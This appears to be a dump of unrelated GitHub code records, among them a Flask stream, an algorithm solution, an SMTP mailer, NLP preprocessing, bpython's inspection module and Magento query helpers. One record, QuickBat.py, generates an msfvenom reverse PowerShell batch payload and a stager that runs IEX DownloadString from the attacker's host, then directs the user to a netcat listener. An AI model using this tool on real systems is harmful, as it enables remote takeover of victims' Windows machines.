boundary=frame\")\n\nif __name__ == \"__main__\":\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--ip\", 
type=str, required=True, help=\"IP Address of the device\")\n ap.add_argument(\"-p\", \"--port\", type=int, required=True, help=\"Port number of the server (1024 to 65535)\")\n ap.add_argument(\"-f\", \"--frame_count\", type=int, required=False, help=\"Number of frames to construct background (if using motion detection)\")\n args = vars(ap.parse_args())\n args[\"frame_count\"] = args[\"frame_count\"] or 32\n print(args)\n \n t1 = threading.Thread(target=get_frame, name=\"StreamCapture\")\n t1.daemon = True\n t1.start()\n\n t2 = threading.Thread(target=detect_motion, name=\"MotionDetector\", args=(args[\"frame_count\"],))\n t2.daemon = True\n t2.start()\n\n socketio.run(app, host=args[\"ip\"], port=args[\"port\"], debug=False)\n # app.run(host=args[\"ip\"], port=args[\"port\"], debug=False)\n\n# Release VideoStream pointer\n# vs.stop()","repo_name":"vjohannesb/baby-monitor","sub_path":"webstream/webstream.py","file_name":"webstream.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18251890733","text":"import sys\ninput = sys.stdin.readline\n\nlength = int(input())\nN = list(map(int, input().split()))\noperator = list(map(int, input().split())) # [+, -, *, /]\n\ndef calc(op, pre, cur):\n if op == 0:\n return pre + cur\n if op == 1:\n return pre - cur\n if op == 2:\n return pre * cur\n if op == 3:\n if pre < 0 or cur < 0:\n return -(abs(pre) // abs(cur))\n return pre // cur\n\ndef backtracking(idx : int, num : int) -> int:\n # idx : 수열 N에서 현재 위치\n # num : 현재까지 누적된 결과값\n if idx == len(N):\n return [num, num]\n min_val = sys.maxsize\n max_val = -1000000001\n\n for i in range(4):\n if operator[i] == 0:\n continue\n operator[i] -= 1\n a, b = backtracking(idx + 1, calc(i, num, N[idx]))\n max_val = max(a, max_val)\n min_val = min(b, min_val)\n operator[i] += 1\n\n return [max_val, min_val]\n\nanswer = backtracking(1, N[0])\nfor a in answer:\n print(a)\n","repo_name":"Just-NB/Algorithm","sub_path":"Baekjoon/부르트포스/Silver/14888_연산자 끼워넣기.py","file_name":"14888_연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38687296181","text":"import os\n\nrun = os.system\nru2 = os.popen\ntxtgreen = '\\033[32m'\ntxtred = '\\033[31m'\ntxtgreen = '\\033[32m'\ntxtyellow = '\\033[33m'\ntxtwhite = '\\033[37m'\ntxtcyan = '\\033[36m'\n\ndef main():\n\tprint(txtgreen + '''\n\n________ .__ __ __________ __ \n\\_____ \\ __ __|__| ____ | | _\\______ \\_____ _/ |_ \n / / \\ \\| | \\ |/ ___\\| |/ /| | _/\\__ \\| __\\ \n/ \\_/. 
\\ | / \\ \\___| < | | \\ / __ \\| | \n\\_____\\ \\_/____/|__|\\___ >__|_ \\|______ /(____ /__| \n \\__> \\/ \\/ \\/ \\/ \n {}RawVendetta -Version1.3{} \n'''.format(txtyellow, txtwhite) + txtwhite)\n\tcontext = os.popen('ip r').read()\n\tinitdata = context.split('src ', 1)\n\tupdata = initdata[1].split(' metric')\n\tlhost = updata[0]\n\tprint('lhost:', lhost)\n\tlport = str(input('Enter Port To Listen On:'))\n\tbname = str(input('Name of file(.bat):'))\n\tbatchname = bname + '.bat'\n\tstagername = bname + 'Update&Setup'\n\tstagerfname = stagername + '.bat'\n\tcommand = 'msfvenom -p cmd/windows/reverse_powershell lhost=' + lhost + ' lport=' + lport + ' > ' + bname + '.bat'\n\taskps = 'nc -lvp ' + lport\n\trun(command)\n\tprint(txtgreen + '\\nGenerating File...\\n' + txtwhite)\n\tprint(txtgreen + 'File Created: ' + bname + '.bat\\nHost ' + lhost + ' is listening on: ' + lport + '\\n' + txtyellow + '\\nTo connect to a remote machine, that machine needs to run the following:\\npowershell -c \"IEX((New-Object System.Net.WebClient).DownloadString(\\'http://'+ lhost + '/' + bname + '.bat\\'))\\n\\nThe above command will have their machine download the files and run it from their computer assuming you are hosting the server there.\\n' + txtwhite)\n\tprint(txtyellow + '!!!' + txtwhite + 'Run \"' + askps + '\" to listen for a connection' + txtyellow + '!!!\\n' + txtwhite)\n\tprint(txtgreen + 'Generating stager: ' + stagerfname + txtwhite)\n\tfile1 = open(stagerfname, 'x')\n\tfile1.close()\n\tmakestager = open(stagerfname, 'a')\n\tmakestager.write('powershell -c \"IEX((New-Object System.Net.WebClient).DownloadString(\\'http://' + lhost + '/' + batchname + '\\'))')\n\tmakestager.close()\n\treadstager = open(stagerfname, 'r')\n\tprint('Wrote the following payload to stager named:' + stagername + '\\ncontaining the following string:\\n' + readstager.read())\n\treadstager.close()\n\tprint('\\nThe client needs to download and execute the stager:' + stagerfname + ' and reverse shell:' + bname)\n\tprint(txtyellow + '\\nAdditional Info:\\nRunning the stager will download the batch reverse shell on the remote machine.\\nYou can run the batch reverse shell standalone, but its not very likely to bypass windows defender this way unless downloaded and installed to a protected folder on a windows operating system.' 
+ txtwhite)\nmain()\n","repo_name":"RawVendetta/QuickBat","sub_path":"QuickBat.py","file_name":"QuickBat.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1207434683","text":"import os\nimport smtplib\nfrom email import encoders\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom datetime import date, timedelta, datetime\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\n\n\ntoday = datetime.now().strftime(r'%y%m%d') # today's date format YYMMDD\n\n\ndef sendmail_with_html_and_attachment(html_content, mail_subject, attach_files=None):\n \"\"\"\n * Send Mail Alerts With Html Content & Attachments\n \"\"\"\n me = 'ColDocker-QA@omnipayments.com'\n recipients = ['dishant@omnipayments.com', 'ankita.harad@omnipayments.com']\n\n # * Create message container - the correct MIME type is multipart/alternative.\n msg = MIMEMultipart('alternative')\n msg['From'] = me\n msg['To'] = ', '.join(recipients)\n\n # * Record the MIME types of both parts - text/plain and text/html.\n part1 = MIMEText(html_content, 'html')\n msg['Subject'] = mail_subject\n msg.attach(part1)\n\n if attach_files != None:\n try:\n for singleFile in attach_files: # add files to the message\n baseFileName = os.path.basename(singleFile)\n # * Helps For Testing/Debug\n # print(f\"Files = {singleFile} | {baseFileName}\")\n attachment = MIMEApplication(open(singleFile, \"rb\").read(), _subtype=\"txt\")\n attachment.add_header('Content-Disposition', 'attachment', filename=baseFileName)\n msg.attach(attachment)\n except Exception as e1:\n # To Handel Multiple File Not Found Error\n print(\"Multiple File Attachment Failed. Error : {}\".format(e1))\n\n # * Send Mail With All Attachments\n try:\n s = smtplib.SMTP('192.168.3.60', 7025)\n # s = smtplib.SMTP('192.168.1.225', 8125)\n s.sendmail(me, recipients, msg.as_string())\n s.quit()\n\n except smtplib.SMTPException as e:\n print('Error :{}'.format(e), 'error')\n\n\nif __name__ == '__main__':\n pass\n\n","repo_name":"AnkitaOmni/gh-first-action","sub_path":"sendmail_alerts.py","file_name":"sendmail_alerts.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33974437657","text":"import os\nimport re\ndict = {}\nreview_list =[]\nid = 0\nre_extract = re.compile('\\d+_(\\d+)') #score is mapped by ()\n\ndef evaluation(score):\n if int(score[0]) > 5:\n return 'pos'\n else:\n return 'neg'\n\ndef replace(text):\n return text.replace('
',\"\")\n\nfor senti in ['neg','pos']:\n directory = f\"C:\\\\Users\\\\submi\\\\OneDrive\\\\바탕 화면\\\\aclImdb\\\\test\\\\{senti}\"\n review_list = os.listdir(directory)\n\n for file in review_list:\n re_score = re_extract.findall(file)\n directory = f\"C:\\\\Users\\\\submi\\\\OneDrive\\\\바탕 화면\\\\aclImdb\\\\test\\\\{senti}\\\\{file}\"\n with open(directory,'rt') as f:\n try:\n review = f.read()\n except UnicodeDecodeError:\n print(id)\n id -= 1\n review = replace(review)\n value = evaluation(re_score)\n dict[id] = {'value':value, 'score':int(re_score[0]), 'text':review}\n id += 1\nwith open('C:\\\\Users\\\\submi\\\\PycharmProjects\\\\makeDataset\\\\dataset.txt','wt') as f:\n print(dict, file=f, end = '\\n')","repo_name":"subminu/LA_project","sub_path":"processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15911319106","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('achieve', '0002_auto_20150513_1902'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('card', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AchieveCollection',\n fields=[\n ('id', models.AutoField(primary_key=True,\n verbose_name='ID', auto_created=True, serialize=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='AchieveCollectionItem',\n fields=[\n ('id', models.AutoField(primary_key=True,\n verbose_name='ID', auto_created=True, serialize=False)),\n ('achieve', models.ForeignKey(to='achieve.Achieve')),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n related_name='collectionAchieves')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='AchieveCollector',\n fields=[\n ('id', models.AutoField(primary_key=True,\n verbose_name='ID', auto_created=True, serialize=False)),\n ('collection', models.ForeignKey(to='card.AchieveCollection')),\n ('item', models.ForeignKey(to='card.AchieveCollectionItem',\n related_name='achieve_collection_item')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='achievecollection',\n name='items',\n field=models.ManyToManyField(\n to='card.AchieveCollectionItem', through='card.AchieveCollector'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='achievecollection',\n name='owner',\n field=models.ForeignKey(\n to=settings.AUTH_USER_MODEL, related_name='achieve_collections'),\n preserve_default=True,\n ),\n ]\n","repo_name":"officefish/la_server","sub_path":"card/migrations/0002_auto_20150514_2122.py","file_name":"0002_auto_20150514_2122.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72387497448","text":"# -*- coding: utf-8 -*-\n\ndef contar_letra(cadena, letra, sensitivo=False):\n cnt = 0\n for char in cadena:\n if sensitivo:\n if char==letra: \n cnt+=1\n else:\n if char.lower()==letra.lower(): \n cnt+=1\n return cnt\n\ndef obtener_cuentas(texto):\n cuenta = {}\n palabras = texto.split(' ')\n for p in palabras:\n if p in cuenta: cuenta[p] = cuenta[p] + 1\n else: cuenta[p] = 1\n return cuenta\n\ndef obtener_cuentas_archivo(direccion):\n with open(direccion, 'r') as archivo:\n contenido = archivo.read()\n 
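# For comparison, the two counting helpers in funcion.py above have one-pass
# equivalents built on collections.Counter; this sketch keeps the same
# behavior but is not code from the original file:
from collections import Counter

def contar_letra(cadena, letra, sensitivo=False):
    # Fold case up front when the match is case-insensitive, then let
    # Counter tally every character in a single pass.
    if not sensitivo:
        cadena, letra = cadena.lower(), letra.lower()
    return Counter(cadena)[letra]

def obtener_cuentas(texto):
    # Counter over the split words mirrors the manual dict loop above.
    return dict(Counter(texto.split(' ')))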
return obtener_cuentas(contenido)\n\nprint(obtener_cuentas_archivo('github_licencia.txt'))\n","repo_name":"lennin92/curso_python","sub_path":"semana_1/ejercicios/funcion.py","file_name":"funcion.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38984724167","text":"from bot.keyboards.default import get_default_markup\nfrom loader import dp, _\nfrom models import User\nfrom aiogram.types import CallbackQuery\nfrom aiogram.dispatcher import FSMContext\n\n\n@dp.callback_query_handler(lambda c: c.data.startswith('main_menu'), state='*')\nasync def back_to_main_menu(callback_query: CallbackQuery, state: FSMContext, user: User) -> None:\n await callback_query.message.delete()\n text = _(\"You have returned to the main menu.\")\n await callback_query.message.answer(text, reply_markup=get_default_markup(user))\n await state.finish()\n\n\n@dp.callback_query_handler(lambda c: c.data == 'cancel')\nasync def cancel_handler(callback_query: CallbackQuery, state: FSMContext):\n prev_state = await state.get_state()\n await callback_query.message.delete()\n await state.reset_state(with_data=False)\n await state.set_state(prev_state) # set state back to previous state\n await callback_query.message.answer(_('Action cancelled.'))","repo_name":"IMZolin/Todolist-Telegram-bot","sub_path":"bot/handlers/tasks/state_handlers.py","file_name":"state_handlers.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1033819432","text":"import pandas as pd\r\nimport spacy\r\nimport nltk\r\nimport re\r\nimport os\r\n\r\ndirname = os.path.dirname(__file__)\r\nnlp = spacy.load('nl_core_news_lg')\r\n\r\ndef callback( str ):\r\n ''''Removes dots from string eg. mister A.B. 
becomes mister AB\r\n :param str: string\r\n :returns: string without dot'''\r\n\r\n return str.replace('.', '')\r\n\r\ndef detect_clauses(sent):\r\n ''''Splits sentence into clauses by grouping children of the heads.\r\n :param sent: string\r\n :returns: list of tuples of id and clause'''\r\n\r\n seen = set() # keep track of covered words\r\n chunks = []\r\n heads = [cc for cc in sent.root.children if cc.dep_ == 'conj']\r\n\r\n for head in heads:\r\n words = [ww for ww in head.subtree]\r\n for word in words:\r\n seen.add(word)\r\n chunk = (' '.join([ww.text for ww in words]))\r\n chunks.append((head.i, chunk))\r\n\r\n unseen = [ww for ww in sent if ww not in seen]\r\n chunk = ' '.join([ww.text for ww in unseen])\r\n chunks.append((sent.root.i, chunk))\r\n chunks = sorted(chunks, key=lambda x: x[0])\r\n return chunks\r\n\r\ndef get_token_id(row):\r\n '''Forms token id from sentence and token number\r\n :param row: row of dataframe\r\n :returns id: token id as string'''\r\n sent = str(row['Sent_id'])\r\n token = str(row['Token_id'])\r\n id = sent + '-' + token\r\n return id\r\n\r\ndef check_same_length(chunk_list, vim_ids):\r\n #lst = list(itertools.chain.from_iterable([chunk[2] for chunk in chunk_list]))\r\n if not len(chunk_list) == len(vim_ids):\r\n print('length of ids and chunk words does not match')\r\n print((len(vim_ids) - len(lst)))\r\n return (len(vim_ids) - len(lst))\r\n else:\r\n return False\r\n\r\ndef change_abbreviations(text):\r\n '''Processes text by lowercasing, removing dots from name abbreviations and replaces most common abbreviations by\r\n full word.\r\n :param text: string\r\n :returns: pre-processed string'''\r\n\r\n text = re.sub(r\"(?:[A-Z]\\.)+\", lambda m: callback(m.group()), text)\r\n text = text.lower()\r\n text = text.replace('cliënt', 'client').replace('patiënt', 'patient').replace(';', ':').replace('vos.', 'alarm').replace('pt.', 'client')\r\n text = text.replace('mw.', 'mevrouw').replace('mr.', 'meneer').replace('dhr.', 'meneer').replace('vzo.', 'zorgondersteuner').replace('v.z.o.', 'zorgondersteuner')\r\n text = text.replace('mvr.', 'mevrouw').replace('mnr.', 'meneer').replace('mevr.', 'mevrouw').replace('og.', 'ondergetekende').replace('pte.', 'client')\r\n text = text.replace('vpk.', 'verpleegkundige').replace('bgl.', 'begeleiding').replace('collega\\'s', 'collega').replace('pat.', 'client')\r\n text = text.replace('og.', 'begeleider').replace('o.g.', 'begeleider').replace('o.g', 'begeleider').replace('dda.', 'dienstdoende arts')\r\n text = text.replace('vzo.', 'verzorging').replace('medecl.', 'medeclient').replace('cl.', 'client').replace('o.g.', 'ondergetekende')\r\n #text = text.replace('ivm.', 'in verband met').replace('i.v.m.', 'in verband met').replace('bijv.', 'bijvoorbeeld').replace('d.w.z.', 'dat wil zeggen').replace('dwz.', 'dat wil zeggen')\r\n #text = text.replace('ipv.', 'in plaats van').replace('i.p.v.', 'in plaats van').replace('o.a.', 'onder andere').replace('oa.', 'onder andere').replace('n.a.v.', 'naar aanleiding van')\r\n #text = text.replace('m.b.t.', 'met betrekking tot').replace('mbt.', 'met betrekking tot').replace('t/m', 'tot en met')\r\n text = re.sub(r'(? 
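# The change_abbreviations step above (truncated here) drives re.sub with a
# replacement callable instead of a plain string, which is what lets it strip
# dots only inside name initials. A minimal self-contained demo of that
# pattern, with made-up sample text:
import re

def strip_dots(match):
    # The callable receives each match object and returns the substitute,
    # so 'J.R.R.' collapses to 'JRR' while unrelated dots stay intact.
    return match.group().replace('.', '')

print(re.sub(r'(?:[A-Z]\.)+', strip_dots, 'mevrouw J.R.R. kwam om 10.30 uur'))
# -> mevrouw JRR kwam om 10.30 uur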
None:\n self.value = value\n\n def __repr__(self) -> str:\n return self.value\n\n __str__ = __repr__\n\n\n@dataclass\nclass ArgSpec:\n args: List[str]\n varargs: Optional[str]\n varkwargs: Optional[str]\n defaults: Optional[List[_Repr]]\n kwonly: List[str]\n kwonly_defaults: Optional[Dict[str, _Repr]]\n annotations: Optional[Dict[str, Any]]\n\n\n@dataclass\nclass FuncProps:\n func: str\n argspec: ArgSpec\n is_bound_method: bool\n\n\nclass AttrCleaner(ContextManager[None]):\n \"\"\"A context manager that tries to make an object not exhibit side-effects\n on attribute lookup.\n\n Unless explicitly required, prefer `getattr_safe`.\"\"\"\n\n def __init__(self, obj: Any) -> None:\n self._obj = obj\n\n def __enter__(self) -> None:\n \"\"\"Try to make an object not exhibit side-effects on attribute\n lookup.\"\"\"\n type_ = type(self._obj)\n # Dark magic:\n # If __getattribute__ doesn't exist on the class and __getattr__ does\n # then __getattr__ will be called when doing\n # getattr(type_, '__getattribute__', None)\n # so we need to first remove the __getattr__, then the\n # __getattribute__, then look up the attributes and then restore the\n # original methods. :-(\n # The upshot being that introspecting on an object to display its\n # attributes will avoid unwanted side-effects.\n __getattr__ = getattr(type_, \"__getattr__\", None)\n if __getattr__ is not None:\n try:\n setattr(type_, \"__getattr__\", (lambda *_, **__: None))\n except (TypeError, AttributeError):\n __getattr__ = None\n __getattribute__ = getattr(type_, \"__getattribute__\", None)\n if __getattribute__ is not None:\n try:\n setattr(type_, \"__getattribute__\", object.__getattribute__)\n except (TypeError, AttributeError):\n # XXX: This happens for e.g. built-in types\n __getattribute__ = None\n self._attribs = (__getattribute__, __getattr__)\n # /Dark magic\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_val: Optional[BaseException],\n exc_tb: Optional[TracebackType],\n ) -> Literal[False]:\n \"\"\"Restore an object's magic methods.\"\"\"\n type_ = type(self._obj)\n __getattribute__, __getattr__ = self._attribs\n # Dark magic:\n if __getattribute__ is not None:\n setattr(type_, \"__getattribute__\", __getattribute__)\n if __getattr__ is not None:\n setattr(type_, \"__getattr__\", __getattr__)\n # /Dark magic\n return False\n\n\ndef parsekeywordpairs(signature: str) -> Dict[str, str]:\n preamble = True\n stack = []\n substack: List[str] = []\n parendepth = 0\n annotation = False\n for token, value in Python3Lexer().get_tokens(signature):\n if preamble:\n if token is Token.Punctuation and value == \"(\":\n # First \"(\" starts the list of arguments\n preamble = False\n continue\n\n if token is Token.Punctuation:\n if value in \"({[\":\n parendepth += 1\n elif value in \")}]\":\n parendepth -= 1\n elif value == \":\":\n if parendepth == -1:\n # End of signature reached\n break\n elif parendepth == 0:\n # Start of type annotation\n annotation = True\n\n if (value, parendepth) in ((\",\", 0), (\")\", -1)):\n # End of current argument\n stack.append(substack)\n substack = []\n # If type annotation didn't end before, it does now.\n annotation = False\n continue\n elif token is Token.Operator and value == \"=\" and parendepth == 0:\n # End of type annotation\n annotation = False\n\n if value and not annotation and (parendepth > 0 or value.strip()):\n substack.append(value)\n\n return {item[0]: \"\".join(item[2:]) for item in stack if len(item) >= 3}\n\n\ndef _fix_default_values(f: Callable, argspec: ArgSpec) 
-> ArgSpec:\n \"\"\"Functions taking default arguments that are references to other objects\n will cause breakage, so we swap out the object itself with the name it was\n referenced with in the source by parsing the source itself!\"\"\"\n\n if argspec.defaults is None and argspec.kwonly_defaults is None:\n # No keyword args, no need to do anything\n return argspec\n\n try:\n src, _ = inspect.getsourcelines(f)\n except (OSError, IndexError):\n # IndexError is raised in inspect.findsource(), can happen in\n # some situations. See issue #94.\n return argspec\n except TypeError:\n # No source code is available, so replace the default values with what we have.\n if argspec.defaults is not None:\n argspec.defaults = [_Repr(str(value)) for value in argspec.defaults]\n if argspec.kwonly_defaults is not None:\n argspec.kwonly_defaults = {\n key: _Repr(str(value))\n for key, value in argspec.kwonly_defaults.items()\n }\n return argspec\n\n kwparsed = parsekeywordpairs(\"\".join(src))\n\n if argspec.defaults is not None:\n values = list(argspec.defaults)\n keys = argspec.args[-len(values) :]\n for i, key in enumerate(keys):\n values[i] = _Repr(kwparsed[key])\n\n argspec.defaults = values\n if argspec.kwonly_defaults is not None:\n for key in argspec.kwonly_defaults.keys():\n argspec.kwonly_defaults[key] = _Repr(kwparsed[key])\n\n return argspec\n\n\n_getpydocspec_re = LazyReCompile(\n r\"([a-zA-Z_][a-zA-Z0-9_]*?)\\((.*?)\\)\", re.DOTALL\n)\n\n\ndef _getpydocspec(f: Callable) -> Optional[ArgSpec]:\n try:\n argspec = pydoc.getdoc(f)\n except NameError:\n return None\n\n s = _getpydocspec_re.search(argspec)\n if s is None:\n return None\n\n if not hasattr_safe(f, \"__name__\") or s.groups()[0] != f.__name__:\n return None\n\n args = []\n defaults = []\n varargs = varkwargs = None\n kwonly_args = []\n kwonly_defaults = {}\n for arg in s.group(2).split(\",\"):\n arg = arg.strip()\n if arg.startswith(\"**\"):\n varkwargs = arg[2:]\n elif arg.startswith(\"*\"):\n varargs = arg[1:]\n elif arg == \"...\":\n # At least print denotes \"...\" as separator between varargs and kwonly args.\n varargs = \"\"\n else:\n arg, _, default = arg.partition(\"=\")\n if varargs is not None:\n kwonly_args.append(arg)\n if default:\n kwonly_defaults[arg] = _Repr(default)\n else:\n args.append(arg)\n if default:\n defaults.append(_Repr(default))\n\n return ArgSpec(\n args, varargs, varkwargs, defaults, kwonly_args, kwonly_defaults, None\n )\n\n\ndef getfuncprops(func: str, f: Callable) -> Optional[FuncProps]:\n # Check if it's a real bound method or if it's implicitly calling __init__\n # (i.e. FooClass(...) and not FooClass.__init__(...) -- the former would\n # not take 'self', the latter would:\n try:\n func_name = getattr(f, \"__name__\", None)\n except:\n # if calling foo.__name__ would result in an error\n func_name = None\n\n try:\n is_bound_method = (\n (inspect.ismethod(f) and f.__self__ is not None)\n or (func_name == \"__init__\" and not func.endswith(\".__init__\"))\n or (func_name == \"__new__\" and not func.endswith(\".__new__\"))\n )\n except:\n # if f is a method from a xmlrpclib.Server instance, func_name ==\n # '__init__' throws xmlrpclib.Fault (see #202)\n return None\n try:\n argspec = _get_argspec_from_signature(f)\n try:\n argspec = _fix_default_values(f, argspec)\n except KeyError as ex:\n # Parsing of the source failed. 
If f has a __signature__, we trust it.\n if not hasattr(f, \"__signature__\"):\n raise ex\n fprops = FuncProps(func, argspec, is_bound_method)\n except (TypeError, KeyError, ValueError):\n argspec_pydoc = _getpydocspec(f)\n if argspec_pydoc is None:\n return None\n if inspect.ismethoddescriptor(f):\n argspec_pydoc.args.insert(0, \"obj\")\n fprops = FuncProps(func, argspec_pydoc, is_bound_method)\n return fprops\n\n\ndef is_eval_safe_name(string: str) -> bool:\n return all(\n part.isidentifier() and not keyword.iskeyword(part)\n for part in string.split(\".\")\n )\n\n\ndef _get_argspec_from_signature(f: Callable) -> ArgSpec:\n \"\"\"Get callable signature from inspect.signature in argspec format.\n\n inspect.signature is a Python 3 only function that returns the signature of\n a function. Its advantage over inspect.getfullargspec is that it returns\n the signature of a decorated function, if the wrapper function itself is\n decorated with functools.wraps.\n\n \"\"\"\n args = []\n varargs = None\n varkwargs = None\n defaults = []\n kwonly = []\n kwonly_defaults = {}\n annotations = {}\n\n # We use signature here instead of getfullargspec as the latter also returns\n # self and cls (for class methods).\n signature = inspect.signature(f)\n for parameter in signature.parameters.values():\n if parameter.annotation is not parameter.empty:\n annotations[parameter.name] = parameter.annotation\n\n if parameter.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:\n args.append(parameter.name)\n if parameter.default is not parameter.empty:\n defaults.append(parameter.default)\n elif parameter.kind == inspect.Parameter.POSITIONAL_ONLY:\n args.append(parameter.name)\n elif parameter.kind == inspect.Parameter.VAR_POSITIONAL:\n varargs = parameter.name\n elif parameter.kind == inspect.Parameter.KEYWORD_ONLY:\n kwonly.append(parameter.name)\n kwonly_defaults[parameter.name] = parameter.default\n elif parameter.kind == inspect.Parameter.VAR_KEYWORD:\n varkwargs = parameter.name\n\n return ArgSpec(\n args,\n varargs,\n varkwargs,\n defaults if defaults else None,\n kwonly,\n kwonly_defaults if kwonly_defaults else None,\n annotations if annotations else None,\n )\n\n\n_get_encoding_line_re = LazyReCompile(r\"^.*coding[:=]\\s*([-\\w.]+).*$\")\n\n\ndef get_encoding(obj) -> str:\n \"\"\"Try to obtain encoding information of the source of an object.\"\"\"\n for line in inspect.findsource(obj)[0][:2]:\n m = _get_encoding_line_re.search(line)\n if m:\n return m.group(1)\n return \"utf8\"\n\n\ndef get_encoding_file(fname: str) -> str:\n \"\"\"Try to obtain encoding information from a Python source file.\"\"\"\n with open(fname, encoding=\"ascii\", errors=\"ignore\") as f:\n for _ in range(2):\n line = f.readline()\n match = _get_encoding_line_re.search(line)\n if match:\n return match.group(1)\n return \"utf8\"\n\n\ndef getattr_safe(obj: Any, name: str) -> Any:\n \"\"\"Side effect free getattr (calls getattr_static).\"\"\"\n result = inspect.getattr_static(obj, name)\n # Slots are a MemberDescriptorType\n if isinstance(result, MemberDescriptorType):\n result = getattr(obj, name)\n # classmethods are safe to access (see #966)\n if isinstance(result, (classmethod, staticmethod)):\n result = result.__get__(obj, obj)\n return result\n\n\ndef hasattr_safe(obj: Any, name: str) -> bool:\n try:\n getattr_safe(obj, name)\n return True\n except AttributeError:\n return 
False\n","repo_name":"bpython/bpython","sub_path":"bpython/inspection.py","file_name":"inspection.py","file_ext":"py","file_size_in_byte":12400,"program_lang":"python","lang":"en","doc_type":"code","stars":2476,"dataset":"github-code","pt":"53"} +{"seq_id":"4280391258","text":"from typing import Optional, Any, Dict, Sequence, Tuple\n\n__all__ = (\n 'Query', 'make_search_query', 'make_field_value_query',\n)\n\nQuery = Optional[Dict[str, Any]]\n\n\ndef make_search_query(filter_groups: Sequence[Sequence[Tuple[str, Any, Optional[str]]]],\n *,\n sort_orders: Optional[Sequence[Tuple[str, str]]] = None,\n page_size: Optional[int] = None,\n current_page: Optional[int] = None):\n \"\"\"\n Build a search query.\n\n Documentation: https://devdocs.magento.com/guides/v2.4/rest/performing-searches.html\n\n Filter groups are AND clauses while filters are OR clauses:\n\n [[(\"a\", 1, \"eq\"), (\"b\", 2, \"eq\")], [(\"c\", 3, \"eq\")]]\n\n Means ``(a=1 OR b=2) AND c=3``. There’s no way to do an OR between AND clauses.\n\n :param filter_groups: sequence of filters. Each filter is a sequence of conditions.\n Each condition is a tuple of (field, value, condition_type). The condition_type can be None if it's \"eq\"\n (the default). See the documentation for the list of possible condition_types.\n :param sort_orders: sequence of tuples (field, direction) for the sort order.\n The direction should be \"asc\" or \"desc\".\n :param page_size:\n :param current_page:\n :return:\n \"\"\"\n query_params: Dict[str, Any] = {}\n if page_size is not None:\n query_params[\"searchCriteria[pageSize]\"] = page_size\n\n if current_page is not None:\n query_params[\"searchCriteria[currentPage]\"] = current_page\n\n for filter_group_index, filter_group in enumerate(filter_groups):\n for filter_index, filter_ in enumerate(filter_group):\n for k, v in (\n (\"field\", filter_[0]),\n (\"value\", filter_[1]),\n (\"condition_type\", filter_[2]),\n ):\n # NOTE: from the doc, \"condition_type is optional if the operator is eq\".\n if k == \"condition_type\" and v is None:\n continue\n query_params[f\"searchCriteria[filter_groups][{filter_group_index}][filters][{filter_index}][{k}]\"] = v\n\n if sort_orders:\n for i, (field, direction) in enumerate(sort_orders):\n query_params[f\"searchCriteria[sortOrders][{i}][field]\"] = field\n query_params[f\"searchCriteria[sortOrders][{i}][direction]\"] = direction\n\n return query_params\n\n\ndef make_field_value_query(field: str, value,\n condition_type: Optional[str] = None,\n page_size: Optional[int] = None,\n current_page: Optional[int] = None,\n *,\n sort_orders: Optional[Sequence[Tuple[str, str]]] = None):\n \"\"\"\n Create a query params dictionary for Magento. 
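# A usage sketch of make_search_query, derived only from the docstring and
# key-building loop above; the field names and values are invented:
# (a=1 OR b=2) AND c=3, sorted ascending on 'a', 20 results per page:
params = make_search_query(
    [[('a', 1, None), ('b', 2, None)], [('c', 3, None)]],
    sort_orders=[('a', 'asc')],
    page_size=20,
)
# The call returns flat Magento searchCriteria keys, e.g.
# params['searchCriteria[filter_groups][0][filters][1][field]'] == 'b'
# params['searchCriteria[sortOrders][0][direction]'] == 'asc'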
This is a simplified version of ``make_search_query``.\n\n :param field:\n :param value:\n :param condition_type: \"eq\", \"neq\", or another.\n See https://devdocs.magento.com/guides/v2.4/rest/performing-searches.html for the full list.\n :param page_size:\n :param current_page:\n :param sort_orders: sequence of tuples (field, direction) for the sort order.\n :return:\n \"\"\"\n return make_search_query([[(field, value, condition_type)]],\n page_size=page_size, current_page=current_page, sort_orders=sort_orders)\n","repo_name":"Bixoto/PyMagento","sub_path":"magento/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20681240556","text":"from django.conf.urls import url\nfrom comments import views\n\nurlpatterns = [\n url(r'^$', views.RetrieveComments.as_view(), name='all'),\n url(r'^create/', views.CreateComment.as_view(), name='create'),\n url(r'^post/', views.PostComment.as_view(), name='test'),\n 